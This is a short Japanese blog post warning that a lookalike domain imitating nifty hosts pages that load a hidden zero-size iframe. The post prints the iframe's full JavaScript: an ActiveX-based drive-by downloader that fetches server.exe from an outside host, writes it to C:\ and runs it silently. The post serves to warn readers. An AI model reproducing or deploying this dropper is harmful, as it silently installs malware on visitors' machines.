hylom's

タイトル通り。


「www.homepage3-nifty.com」と、URLだけみるとぱっと見nifty内にあるサイトっぽいけど、実はよく見ると分かるとおりnifty内ではなく、中国のサイトにつながるようで。



で、このサイト上にあるページには幅0、高さ0のインラインフレームに以下のようなスクリプトを仕込んだページを表示させる、と。

よく考えるよなぁ。確かにこのURLだとダマされる人が出てくるかも。

function do1(mx,as,p)

{
    mx.Send();
    as.Type = 1;
    as.Open();
    as.Write(mx.responseBody);
    as.SaveToFile(p,2);
    as.Close();
}
var a = null;
var mx,as,p;
p = “C:\\pageflies2.exe”
a = (document.createElement(“object”));
a.setAttribute(“classid”,”clsid:BD96C556-65A3-11D0-983A-00C04FC29E36”);
try{mx = a.CreateObject(“Microsoft.XMLHTTP”,””);}catch(e){};
if(!mx)try{mx = new ActiveXObject(“Microsoft.XMLHTTP”);}catch(e){};
try{as = a.CreateObject(“Adodb.Stream”,””);}catch(e){};
if(as){
    mx.Open(“GET”,”http://www.game-oekakibbs.com/bbs/server.exe”,0);
    do1(mx,as,p);
    var r;
    try{r = a.CreateObject(“Shell.Application”,””);}catch(e){};
    if(r)
    {
        r.ShellExecute(p,””,””,”open”,0);
    }else
    {
        try{r = a.CreateObject(“WScript.Shell”,””);}catch(e){};
        if(r)r.Run(p,0);
    }
}